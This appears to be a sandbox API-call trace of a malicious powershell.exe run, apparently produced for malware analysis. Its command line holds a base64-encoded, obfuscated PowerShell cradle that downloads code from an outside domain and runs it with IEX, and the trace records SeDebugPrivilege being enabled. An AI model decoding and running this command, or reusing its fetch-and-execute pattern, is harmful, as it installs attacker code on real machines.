	[0565.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.842] CoTaskMemFree (pv=0x3baac0) 
	[0565.843] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0565.843] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0565.843] CoTaskMemFree (pv=0x3baac0) 
	[0565.849] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0565.849] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0565.849] CoTaskMemFree (pv=0x3baac0) 
	[0565.852] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c71e500 | out: pNumArgs=0x1c71e500) returned 0x340da0*=""
	[0565.853] lstrlenW (lpString="-EncodedCommand") returned 15
	[0565.854] CoTaskMemAlloc (cb=0x22) returned 0x1b7dec70
	[0565.854] RtlMoveMemory (in: Destination=0x1b7dec70, Source=0x340dc2, Length=0x20 | out: Destination=0x1b7dec70) 
	[0565.854] CoTaskMemFree (pv=0x1b7dec70) 
	[0565.854] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0565.854] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7ea9f0
	[0565.854] RtlMoveMemory (in: Destination=0x1b7ea9f0, Source=0x340de2, Length=0x2f2 | out: Destination=0x1b7ea9f0) 
	[0565.854] CoTaskMemFree (pv=0x1b7ea9f0) 
	[0565.855] LocalFree (hMem=0x340da0) returned 0x0
	[0565.855] CoTaskMemAlloc (cb=0x804) returned 0x1b79ab00
	[0565.856] GetConsoleTitleW (in: lpConsoleTitle=0x1b79ab00, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0567.112] CoTaskMemFree (pv=0x1b79ab00) 
	[0567.121] CoTaskMemAlloc (cb=0x38e) returned 0x340da0
	[0567.121] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c71e460*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e8f6e0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e8f6e0*(hProcess=0x304, hThread=0x354, dwProcessId=0x101c, dwThreadId=0x35c)) returned 1
	[0567.130] CoTaskMemFree (pv=0x340da0) 
	[0567.131] CloseHandle (hObject=0x354) returned 1
	[0567.131] CoTaskMemAlloc (cb=0x3b) returned 0x3b52e0
	[0567.131] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c71e508, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c71e508) returned 0x4550
	[0567.132] CoTaskMemFree (pv=0x3b52e0) 
	[0567.135] GetCurrentProcess () returned 0xffffffffffffffff
	[0567.135] GetCurrentProcess () returned 0xffffffffffffffff
	[0567.136] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x304, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c71e5e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c71e5e8*=0x354) returned 1

Process:
	id = "37"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1031f000"
	os_pid = "0x518"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 197
	os_tid = 0xb84

	[0293.187] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0592.594] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0596.895] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0596.895] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0596.895] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0596.895] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0609.337] GetVersionExW (in: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.336] GetVersionExW (in: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.354] GetVersionExW (in: lpVersionInformation=0x16dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.355] SetErrorMode (uMode=0x1) returned 0x1
	[0610.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16de70 | out: lpFileInformation=0x16de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0610.357] SetErrorMode (uMode=0x1) returned 0x1
	[0610.361] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e0e0 | out: lpdwHandle=0x16e0e0) returned 0x94c
	[0610.363] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ba72d8 | out: lpData=0x2ba72d8) returned 1
	[0610.366] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e058, puLen=0x16e050 | out: lplpBuffer=0x16e058*=0x2ba7374, puLen=0x16e050) returned 1
	[0611.221] lstrlenW (lpString="䅁") returned 1
	[0611.238] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba7450, puLen=0x16dfc0) returned 1
	[0611.241] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0611.248] CoTaskMemAlloc (cb=0x2e) returned 0x2a3000
	[0611.248] lstrcpyW (in: lpString1=0x2a3000, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0611.249] CoTaskMemFree (pv=0x2a3000) 
	[0611.249] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba74a4, puLen=0x16dfc0) returned 1
	[0611.249] lstrlenW (lpString="System.Management.Automation") returned 28
	[0611.249] CoTaskMemAlloc (cb=0x3c) returned 0x1d97c0
	[0611.249] lstrcpyW (in: lpString1=0x1d97c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0611.249] CoTaskMemFree (pv=0x1d97c0) 
	[0611.249] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba7500, puLen=0x16dfc0) returned 1
	[0611.249] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0611.249] CoTaskMemAlloc (cb=0x20) returned 0x2a0eb0
	[0611.249] lstrcpyW (in: lpString1=0x2a0eb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0611.249] CoTaskMemFree (pv=0x2a0eb0) 
	[0611.249] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba7540, puLen=0x16dfc0) returned 1
	[0611.249] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0611.249] CoTaskMemAlloc (cb=0x44) returned 0x1d97c0
	[0611.250] lstrcpyW (in: lpString1=0x1d97c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0611.250] CoTaskMemFree (pv=0x1d97c0) 
	[0611.250] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba75a8, puLen=0x16dfc0) returned 1
	[0611.250] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0611.250] CoTaskMemAlloc (cb=0x76) returned 0x2413c0
	[0611.250] lstrcpyW (in: lpString1=0x2413c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0611.250] CoTaskMemFree (pv=0x2413c0) 
	[0611.250] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba7644, puLen=0x16dfc0) returned 1
	[0611.250] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0611.250] CoTaskMemAlloc (cb=0x44) returned 0x1d97c0
	[0611.250] lstrcpyW (in: lpString1=0x1d97c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0611.250] CoTaskMemFree (pv=0x1d97c0) 
	[0611.250] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba76a8, puLen=0x16dfc0) returned 1
	[0611.250] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0611.250] CoTaskMemAlloc (cb=0x58) returned 0x1f6a50
	[0611.250] lstrcpyW (in: lpString1=0x1f6a50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0611.250] CoTaskMemFree (pv=0x1f6a50) 
	[0611.250] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba7724, puLen=0x16dfc0) returned 1
	[0611.251] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0611.251] CoTaskMemAlloc (cb=0x20) returned 0x2a0eb0
	[0611.251] lstrcpyW (in: lpString1=0x2a0eb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0611.251] CoTaskMemFree (pv=0x2a0eb0) 
	[0611.251] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2ba73cc, puLen=0x16dfc0) returned 1
	[0611.251] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0611.251] CoTaskMemAlloc (cb=0x66) returned 0x21b9a0
	[0611.251] lstrcpyW (in: lpString1=0x21b9a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0611.251] CoTaskMemFree (pv=0x21b9a0) 
	[0611.251] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0611.251] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0611.251] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0611.251] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df98, puLen=0x16df90 | out: lplpBuffer=0x16df98*=0x2ba7374, puLen=0x16df90) returned 1
	[0611.252] CoTaskMemAlloc (cb=0x204) returned 0x25aeb0
	[0611.252] VerLanguageNameW (in: wLang=0x0, szLang=0x25aeb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0612.234] CoTaskMemFree (pv=0x25aeb0) 
	[0612.235] VerQueryValueW (in: pBlock=0x2ba72d8, lpSubBlock="\\", lplpBuffer=0x16dfe8, puLen=0x16dfe0 | out: lplpBuffer=0x16dfe8*=0x2ba7300, puLen=0x16dfe0) returned 1
	[0612.242] GetCurrentProcessId () returned 0x518
	[0612.258] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cf10 | out: lpLuid=0x16cf10*(LowPart=0x14, HighPart=0)) returned 1
	[0612.261] GetCurrentProcess () returned 0xffffffffffffffff
	[0612.262] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cf30 | out: TokenHandle=0x16cf30*=0x2d8) returned 1
	[0612.263] AdjustTokenPrivileges (in: TokenHandle=0x2d8, DisableAllPrivileges=0, NewState=0x2baab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0612.264] CloseHandle (hObject=0x2d8) returned 1
	[0612.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x518) returned 0x2d8
	[0613.372] EnumProcessModules (in: hProcess=0x2d8, lphModule=0x2baabb8, cb=0x200, lpcbNeeded=0x16df48 | out: lphModule=0x2baabb8, lpcbNeeded=0x16df48) returned 1
	[0613.374] GetModuleInformation (in: hProcess=0x2d8, hModule=0x13f370000, lpmodinfo=0x2baae28, cb=0x18 | out: lpmodinfo=0x2baae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0613.375] CoTaskMemAlloc (cb=0x804) returned 0x2a9030
	[0613.375] GetModuleBaseNameW (in: hProcess=0x2d8, hModule=0x13f370000, lpBaseName=0x2a9030, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0613.375] CoTaskMemFree (pv=0x2a9030) 
	[0613.376] CoTaskMemAlloc (cb=0x804) returned 0x2a9030
	[0613.376] GetModuleFileNameExW (in: hProcess=0x2d8, hModule=0x13f370000, lpFilename=0x2a9030, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0613.377] CoTaskMemFree (pv=0x2a9030) 
	[0613.378] CloseHandle (hObject=0x2d8) returned 1
	[0613.389] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x518) returned 0x2d8
	[0613.393] GetExitCodeProcess (in: hProcess=0x2d8, lpExitCode=0x16e078 | out: lpExitCode=0x16e078*=0x103) returned 1
	[0614.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bab088, Length=0x20000, ResultLength=0x16e040 | out: SystemInformation=0x12bab088, ResultLength=0x16e040*=0x36e08) returned 0xc0000004
	[0614.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb0b8, Length=0x39608, ResultLength=0x16e040 | out: SystemInformation=0x12bcb0b8, ResultLength=0x16e040*=0x36e08) returned 0x0
	[0615.382] EnumWindows (lpEnumFunc=0x2b266ac, lParam=0x0) returned 1
	[0622.452] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0623.816] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x558
	[0624.675] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.684] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.687] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.690] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0625.439] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0625.638] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0626.460] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0626.930] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.934] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.940] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.943] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.946] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.948] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0628.515] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0629.711] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0629.718] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0629.723] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0629.725] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x3a8
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bd0
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bfc
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1a78
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b90
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b04
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b34
	[0631.310] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b64
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bb0
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1acc
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1a2c
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x19a8
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1944
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18c8
	[0631.311] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18ac
